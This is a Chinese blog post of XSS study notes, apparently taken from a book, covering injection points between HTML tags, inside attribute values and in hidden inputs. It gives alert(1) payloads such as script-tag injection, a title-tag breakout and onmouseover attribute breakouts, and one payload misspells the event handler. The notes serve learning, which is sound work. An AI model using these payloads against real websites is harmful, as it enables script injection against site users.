美文网首页
xss漏洞挖掘

xss漏洞挖掘

作者: 心如水_0b05 | 来源:发表于2017-05-08 00:22 被阅读0次
--《web前端黑客技术加密》

HTML标签之间

普通场景
<div id="body">[输出]</div>

提交

id=1<script>alert(1)</script>

综合

<div id="body">1<script>alert(1)</script></div>
无法执行脚本的标签

title:定义文档的标题
textarea:定义多行的文本输入控件
xmp:定义预格式文本。
iframe:创建包含另外一个文档的内联框架(即行内框架)
noscript:定义在脚本未被执行时的替代内容(文本)
noframes:可为那些不支持框架的浏览器显示文本。noframes 元素位于 frameset 元素内部。
plaintext:纯文本,和 pre 一样,代码中的空格和换行会直接显示到页面上。另外 < 和 > 和 & 也会直接显示。
解决方法:闭合,例如title

</title><script>alert</script>

HTML标签之内

普通场景
<input id="text" value="[输出]"/>

提交

"onmouseover=alert(1)x="

综合为:

<input id="text" value=""onmouseover=alert(1)x=""/>
"><script>alert(1)</script>

综合为:

<input id="text" value=""><script>alert(1)</script>"/>

书上解释为:这种是闭合属性后又闭合标签,然后直接执行脚本
同学解释为:input标签不需要闭合即执行,在达到目的后,后面无闭合已无所谓

其它场景

type为hidden
1)闭合
2)若type在输出后,可在payload中加入type=text
例如:
原语句为:

<input value="输入" type=hidden"/>

payload:

1" onmouserover=alert(1) type="text

综合为:

<input value="1" onmouserover=alert(1) type="text" type=hidden"/>

2.待续吧。。。

相关文章

  • (基础)XSS与CSRF代码审计

    XSS xss漏洞个人感觉就两种,一种是反射型xss,另外一种是存储型xss。我之前用bp学习xss漏洞挖掘的时候...

  • xss漏洞挖掘

    --《web前端黑客技术加密》 HTML标签之间 普通场景 提交 综合 无法执行脚本的标签 title:定义文档的...

  • XSS漏洞挖掘

    写在前面 文章内容参考自https://twosecurity.io/http://www.4hou.com/we...

  • 2017/04/28

    几乎是挖了一天了xss 0x00 xss漏洞挖掘 漏洞盒子上找了些厂商,测试了下xss最先使用了最常见的paylo...

  • 代码审计——xss漏洞

    XSS漏洞大致分为三种 反射型XSS漏洞 存储型XSS漏洞 基于DOM的XSS漏洞 反射型XSS漏洞 它通过给别人...

  • 刘道军《企业安全渗透测试》

    课程简介: 本课程讲解了渗透测试情况收集、使用漏洞扫描工具挖掘漏洞;各种漏洞的原理及实战,包括XSS、CSRF、弱...

  • XSS漏洞挖掘与利用

    XSS的检测 检测XSS一般分两种方法:一种是手工检测、一种是软件自动检测手工检测:检测结果准确,但对于大型web...

  • XSS漏洞解析与挖掘

    漏洞简介 跨站脚本攻击又名XSS,全称为Cross Site Scripting,为了区别层叠样式表(CSS)所以...

  • 跨站脚本漏洞(XSS)基础讲解

    XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,...

  • 跨站脚本漏洞(XSS)基础讲解

    XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,...

网友评论

      本文标题:xss漏洞挖掘

      本文链接:https://www.haomeiwen.com/subject/suautxtx.html